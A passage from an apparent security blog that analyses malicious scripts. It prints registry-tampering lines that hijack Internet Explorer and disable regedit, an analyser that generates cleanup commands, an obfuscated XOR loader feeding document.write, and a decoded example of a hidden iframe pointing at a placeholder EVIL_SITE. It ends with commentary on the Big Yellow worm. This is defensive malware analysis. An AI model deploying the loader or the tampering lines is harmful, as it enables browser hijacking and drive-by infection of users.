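Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",1,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Homepage",1,"REG_DWORD");
`;

// Key-prefix classification; first match wins, so policy keys are caught before the IE catch-all.
const CLASSES = [
  [/\\CurrentVersion\\Run(Once)?\\/i,   'persistence'],
  [/\\Policies\\/i,                     'lockdown'],
  [/\\Internet Settings\\ZoneMap\\/i,   'zone-tampering'],
  [/\\Internet Explorer\\TypedURLs\\/i, 'history-poisoning'],
  [/\\Internet Explorer\\/i,            'browser-hijack'],
  [/\\Yahoo\\Pager\\/i,                 'im-client-hijack'],
];

// RegWrite(<key literal>, <string literal | number | identifier> ...)
const REGWRITE_RE = /\.RegWrite\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*("(?:[^"\\]|\\.)*"|\d+|[A-Za-z_$][\w$]*)/g;
const ASSIGN_RE = /\b([A-Za-z_][\w$]*)\s*=\s*"((?:[^"\\]|\\.)*)"/g;
const unescapeJs = s => s.replace(/\\(.)/g, '$1');

function extractWrites(src) {
  const vars = new Map();
  for (const m of src.matchAll(ASSIGN_RE)) vars.set(m[1], unescapeJs(m[2]));
  return Array.from(src.matchAll(REGWRITE_RE), m => {
    const key = unescapeJs(m[1]);
    const raw = m[2];
    const value = raw[0] === '"' ? unescapeJs(raw.slice(1, -1)) : (vars.get(raw) ?? raw);
    const cls = (CLASSES.find(([re]) => re.test(key)) || [null, 'other'])[1];
    const sep = key.lastIndexOf('\\');           // WScript RegWrite: last path component is the value name
    return { key, value, cls, path: key.slice(0, sep), name: key.slice(sep + 1) };
  });
}

function cleanupPlan(writes) {
  const lines = new Set();
  for (const w of writes) {
    if (w.cls === 'zone-tampering') lines.add(`reg delete "${w.path}" /f`);      // drop the whole domain key
    else lines.add(`reg delete "${w.path}" /v "${w.name}" /f`);
    if (w.cls === 'persistence' && /^[a-z]:\\/i.test(w.value)) lines.add(`del /f "${w.value}"`);
  }
  return [...lines];
}

const writes = extractWrites(SAMPLE_SCRIPT);
for (const w of writes) console.log(w.cls.padEnd(18), w.key, '=', w.value);
console.log(cleanupPlan(writes).join('\n'));
```

Order matters when the plan is run: the Policies values go first, because with DisableRegistryTools set a user cannot open regedit to fix the rest by hand, and the dropped .js is deleted only after the Run/RunOnce values that would relaunch it are gone.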

More interesting web code

This is a random javascript snippet I found today which I will analyze later. Just recording for posterity.

<script language="JavaScript">
// key: '0x00'+'27' is the string "0x0027"; the ^ below coerces it to the number 0x27 (39)
e = '0x00' + '27';
str1 = "%9C%C4%CF%D2%B8%D5%D4%DF%CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A";
str = tmp = '';
// three characters ("%XX") per encoded byte; each byte is XORed with the key and shifted down by 127
for (i = 0; i < str1.length; i += 3) {
  tmp = unescape(str1.slice(i, i + 3));
  str = str + String.fromCharCode((tmp.charCodeAt(0) ^ e) - 127);
}
document.write(str);   // the decoded markup goes straight into the page
</script>
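The inverse of the routine above, run offline so nothing reaches document.write, added as an example (not the post's own code). It keeps the snippet's names: `e` is the expression `'0x00' + '27'`, which the `^` operator coerces with Number() to 39, so each byte decodes as (byte ^ 39) - 127. An encoder is included so the round trip can be checked on a constructed payload with a placeholder host rather than on the live string.

```javascript
// Added example, not code from the original post: offline decoder for the XOR-and-shift scheme above.

// Mirrors `e = '0x00' + '27'`: concatenate, then let Number() parse the hex string (39).
function keyFromExpr(parts) {
  return Number(parts.join(''));
}

// Same arithmetic as the snippet, without unescape() or document.write().
function decodeTriple(str1, key) {
  let out = '';
  for (let i = 0; i < str1.length; i += 3) {
    const b = parseInt(str1.slice(i + 1, i + 3), 16);   // each "%XX" is one byte
    out += String.fromCharCode((b ^ key) - 127);
  }
  return out;
}

// Inverse transform, used only to build test material: byte = (char + 127) ^ key.
function encodeTriple(plain, key) {
  let out = '';
  for (const ch of plain) {
    const b = (ch.charCodeAt(0) + 127) ^ key;
    if (b < 0 || b > 255) throw new RangeError(`cannot encode ${JSON.stringify(ch)} with this scheme`);
    out += '%' + b.toString(16).toUpperCase().padStart(2, '0');
  }
  return out;
}

const KEY = keyFromExpr(['0x00', '27']);   // 39
// Constructed payload (placeholder host), in the shape this kind of loader usually produces.
const SAMPLE_PLAIN = '<div style="visibility:hidden"><iframe src="http://EVIL_SITE/x/" width=1 height=1></iframe></div>';
const SAMPLE_ENCODED = encodeTriple(SAMPLE_PLAIN, KEY);

console.log(SAMPLE_ENCODED.slice(0, 12), '->', decodeTriple(SAMPLE_ENCODED, KEY));
```

Feeding the snippet's own `str1` to `decodeTriple(str1, 39)` yields its markup without the page ever executing it; the first four groups of that string, `%9C%C4%CF%D2`, come out as `<div`, which is how the placeholder above was shaped.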

It seems like it could be a more advanced unpacker than most of the lame ones I normally see. Wait, I just ran through the code again and it’s lame. Oh well. At least later I can figure out what it says decoded…

Big Yellow

Two of my former employers have made the news again. “Big Yellow” is a new worm/bot-net discovered by eEye Digital Security which affects users of anti-virus from software maker Symantec. I’ve heard very recently one analyst say that “anti virus is dead” but I don’t think this is what he had in mind. The fact is that Symantec products dominate the IT landscape and most of the home market as well. Anti-virus is still treated as an integral part of the operating system, so much so that even Microsoft has dragged itself into the marketplace. However, in Big Yellow we see one of the most effective styles of attack out there: like the ASN.1 vulnerability, it only affects users who are “secured”.

Users who run anti-virus pay a “tax” in the form of lost resources: processor, memory and disk access are all used by the anti-virus programs to compute file signatures and match them against an ever growing signature database. End users consider this tax worthwhile since they can remain safe. This new threat, however, will only infect the users of Symantec’s anti-virus, thus putting them in greater danger than someone who isn’t using any anti-virus at all, or free alternatives like ClamAV and AntiVir. Seems ironic really.

What makes this worse is that Symantec doesn’t seem to have a good handle on what is really going on. Vincent Weafer, senior director with Symantec Security Response, states, “We have had three submissions locally from our customers.” eEye “has counted about 70,000 compromised systems”. Counting infections is really easy to do if one is sitting on the botnet itself. And with 70,000 zombies all idling in the channel it is pretty easy to hide out and watch newly infected computers roll in. I did this myself for Elf.Kaiten.Q and the numbers I counted were significantly higher than any AV vendor reported. Even the Internet Storm Center shows significant numbers for this threat.

This compounds the danger, since Symantec will diminish their response if they don’t believe a real threat exists, a threat which eEye has sufficiently pointed out. 70,000 nodes in a botnet can accomplish a lot of bad things including but not limited to spamming operations, distributed denial of service, or even identity theft.